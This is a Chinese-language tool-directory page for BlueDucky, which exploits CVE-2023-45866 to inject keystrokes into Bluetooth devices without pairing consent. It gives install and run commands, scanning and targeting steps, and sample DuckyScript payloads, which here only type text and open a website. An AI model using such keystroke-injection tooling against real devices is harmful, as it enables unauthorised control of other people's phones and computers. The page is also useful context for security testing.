Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
BlueDucky — BlueDucky 利用蓝牙漏洞(具体为 CVE-2023-45866),允许攻击者向目标设备注入按键。攻击者的设备伪装成蓝牙键盘,在未经用户授权的情况下建立加密连接。BlueDucky 工具自动完成这一过程。 | Kitploit
工具/GitHubGitHub/sergeb250/blueducky
蓝牙安全Payload生成漏洞利用无线安全渗透测试红队
GitHubsergeb250/blueducky

BlueDucky

BlueDucky 利用蓝牙漏洞(具体为 CVE-2023-45866),允许攻击者向目标设备注入按键。攻击者的设备伪装成蓝牙键盘,在未经用户授权的情况下建立加密连接。BlueDucky 工具自动完成这一过程。

查看仓库
1111个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

BlueDucky 版本 2.1 (Android) 🦆

感谢 HackNexus 的所有人。一定要来加入我们的语音聊天! https://discord.gg/HackNexus

注意:除了树莓派外,我无法在其他笔记本或其他设备上运行此程序进行测试。因此,如果遇到任何问题,你们需要互相解决,因为我没有多余的资金购买适配器。

  1. saad0x1 的 GitHub
  2. spicydll 的 GitHub
  3. lamentomori 的 GitHub

🚨 CVE-2023-45866 - BlueDucky 实现(使用 DuckyScript)

🔓 未认证对等连接导致代码执行(使用 HID 键盘)

这是 marcnewlin 发现的 CVE 的实现

简介 📢

BlueDucky 是一个强大的工具,用于利用蓝牙设备中的漏洞。通过运行此脚本,你可以:

  1. 📡 加载已保存但不再可见且蓝牙仍启用的蓝牙设备。
  2. 📂 自动保存你扫描到的任何设备。
  3. 💌 通过 ducky 脚本格式发送消息以与设备交互。

我已在树莓派 4 上使用默认蓝牙模块成功运行此程序。它适用于多种手机,但有一个有趣的例外:新西兰品牌 Vodafone。

安装与使用 🛠️

基于 Debian 系统的设置说明

root@kitploit:~
# 更新 apt
sudo apt-get update
sudo apt-get -y upgrade

# 从 apt 安装依赖
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
                    git gcc python3-pip python3-setuptools \
                    python3-pydbus

# 从源码安装 pybluez
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# 从 bluez 源码构建 bdaddr
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

基于 Arch 系统的设置说明

root@kitploit:~
# 更新 pacman 及软件包
sudo pacman -Syyu

# 安装依赖
# 由于 arch 不分离库包:libbluetooth-dev 包含在 bluez 包中
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
               python-setuptools python-pydbus python-dbus
               git gcc python-pip \

# 从源码安装 pybluez
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# 从 bluez 源码构建 bdaddr
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

运行 BlueDucky

root@kitploit:~
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py

或者,

root@kitploit:~
pip3 install -r requirements.txt

操作步骤 🕹️

  1. 运行时,会提示输入目标 MAC 地址。
  2. 什么都不按会触发自动扫描设备。
  3. 之前找到的设备会存储在 known_devices.txt 中。
  4. 如果 known_devices.txt 存在,会在扫描前检查该文件。
  5. 使用 payload.txt 文件执行。
  6. 成功执行后,将自动连接并运行脚本。

DuckyScript 💻

🚧 正在进行中:

  • 请给我一些建议

版本 2.1 🐛

  • 更新了用户界面
  • 改进了用户体验
  • 蓝牙调试器:在允许访问应用程序之前检查你的蓝牙适配器和已安装的依赖项,以防止不支持设备运行。
  • 请注意:进行了许多更改,具体更改请参考提交历史。

下一个版本计划什么?

  • 集成 DuckyScript 控制台,用于在有效负载运行后希望保持持久性的攻击
  • 建议下一步应该添加什么!加入 https://discord.gg/HackNexus

📝 示例 payload.txt:

root@kitploit:~
REM 有效负载的标题
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
root@kitploit:~
REM 打开一个私有浏览器进入 hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER 等于 CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300

尽情尝试 BlueDucky 吧!🌟

下载工具